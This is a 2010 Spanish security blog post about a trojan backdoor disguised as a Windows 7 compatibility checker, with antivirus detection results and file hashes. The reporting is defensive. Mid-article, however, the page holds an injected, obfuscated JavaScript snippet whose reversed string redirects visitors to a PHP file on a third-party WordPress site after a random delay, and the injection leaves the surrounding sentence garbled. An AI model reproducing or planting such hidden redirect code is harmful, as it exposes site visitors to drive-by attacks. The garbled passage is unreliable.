Un comprobador de compatibilidad de Windows 7 resulta ser un troyano backdoor

Publicado el 11 mayo 2010 ¬ 13:59 pmh.mscComentarios desactivados en Un comprobador de compatibilidad de Windows 7 resulta ser un troyano backdoor

Los estafadores están infectando ordenadores con un Troyano disfrazado de software de PC para determinar si son compatibles con Windows 7.

El ataque fue visto por primera vez el domingo pasado y todavía no es generalizado. Sin embargo, podría terminar infectando a mucha gente, debido al interés en Windows 7.

Los estafadores emulan el ofrecimiento de Microsoft, que ofrece una descarga legítima de “Windows 7 Upgrade Advisor” en su sitio Web: http://www.microsoft.com/windows/windows-7/get/upgrade-advisor.aspx

“Averigüe si su PC puede ejecutar Windows 7,” los e-mails leídos, haciéndose eco de la página Web de Microsoft. “Este software escanea tu PC para los posibles problemas con su hardware, dispositivos y programas instalados, y recomienda qué hacer antes de actualizar.”

Los usuarios que intentan instalar dicho archivo comprimido acaban instalando un troyano backdoor en su ordenador.

Una vez que la víctima ha instalado el software, los delincuentes pueden hacer casi todo lo que quieran en el PC, incluso instalar un keylogger para robar datos bancarios o incluso para obtener pleno acceso al sistema hackeado.

Se cree que varios miles de personas se han infectado ya con el troyano hasta la fecha, pero ese número probablemente crecerá rápidamente como con todos los malwares. 
 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es”>www.virustotal.com/es no sea el caso …

Y si lo consideran malware unos cuantos antivirus del VirusTotal, enviarnos el fichero para analizar y controlar con nuestras utilidades.

Resulta ser el mismo que está siendo utilizado en una campaña falsa de Facebook para restablecer la contraseña .

 Infected File:

a-squared 4.5.0.50 2010.05.06 Trojan.Win32.Oficla!IK
AhnLab-V3 2010.05.05.00 2010.05.05 Dropper/Malware.48640.M
AntiVir 8.2.1.236 2010.05.06 TR/Oficla.M.165
Antiy-AVL 2.0.3.7 2010.05.06 Trojan/Win32.Inject.gen
Authentium 5.2.0.5 2010.05.06 W32/Oficla.L
Avast 4.8.1351.0 2010.05.05 Win32:Trojan-gen
Avast5 5.0.332.0 2010.05.05 Win32:Trojan-gen
AVG 9.0.0.787 2010.05.05 Generic17.BISE
BitDefender 7.2 2010.05.06 Trojan.Generic.3783603
CAT-QuickHeal 10.00 2010.05.04 Trojan.Inject.apdr
ClamAV 0.96.0.3-git 2010.05.06 –
Comodo 4778 2010.05.06 Heur.Suspicious
DrWeb 5.0.2.03300 2010.05.06 Trojan.Oficla.38
eSafe 7.0.17.0 2010.05.05 –
eTrust-Vet 35.2.7470 2010.05.05 –
F-Prot 4.5.1.85 2010.05.06 W32/Oficla.L
F-Secure 9.0.15370.0 2010.05.06 Trojan-Downloader:W32/Oficla.Y
Fortinet 4.0.14.0 2010.05.05 W32/Agent.ZPM!tr
GData 21 2010.05.06 Trojan.Generic.3783603
Ikarus T3.1.1.84.0 2010.05.06 Trojan.Win32.Oficla
Jiangmin 13.0.900 2010.05.06 Trojan/Inject.kkn
Kaspersky 7.0.0.125 2010.05.06 Trojan.Win32.Inject.apdr
McAfee 5.400.0.1158 2010.05.06 Generic.dx!sei
McAfee-GW-Edition 2010.1 2010.05.06 Heuristic.LooksLike.Trojan.Oficla.I
Microsoft 1.5703 2010.05.05 TrojanDropper:Win32/Oficla.G
NOD32 5089 2010.05.05 Win32/Oficla.GO
Norman 6.04.12 2010.05.06 W32/Oficla.FA
nProtect 2010-05-06.02 2010.05.06 Trojan.Generic.3783603
Panda 10.0.2.7 2010.05.05 Trj/Bredolab.AX
PCTools 7.0.3.5 2010.05.06 Backdoor.Bredolab
Prevx 3.0 2010.05.06 High Risk Cloaked Malware
Rising 22.46.03.04 2010.05.06 Trojan.Win32.Generic.5201346C
Sophos 4.53.0 2010.05.06 Mal/FakeAV-BW
Sunbelt 6265 2010.05.06 Backdoor.Win32.Hupigon (v)
Symantec 20091.2.0.41 2010.05.06 Trojan.Sasfis
TheHacker 6.5.2.0.276 2010.05.06 Trojan/CI.gen
TrendMicro 9.120.0.1004 2010.05.06 TROJ_SASFIS.AF
TrendMicro-HouseCall 9.120.0.1004 2010.05.06 TROJ_SASFIS.AF
VBA32 3.12.12.4 2010.05.06 Trojan.Win32.Inject.apdr
ViRobot 2010.5.4.2303 2010.05.06 Trojan.Win32.Inject.48640.F
VirusBuster 5.0.27.0 2010.05.05 Trojan.Kryptik.PBL

File size: 48640 bytes
MD5 : d2b9ba2de3ed1d1becac382c688f4a3e
SHA1 : 9426a9877425ead610060c705ba915f73f1857ad

Se puede detectar ya mismo con nuestro ELIMD5, introduciendole cualquiera de los hashes indicados al final del informe anterior, por ejemplo d2b9ba2de3ed1d1becac382c688f4a3e
saludos

ms, 11-5-2010

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Sin categoría

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies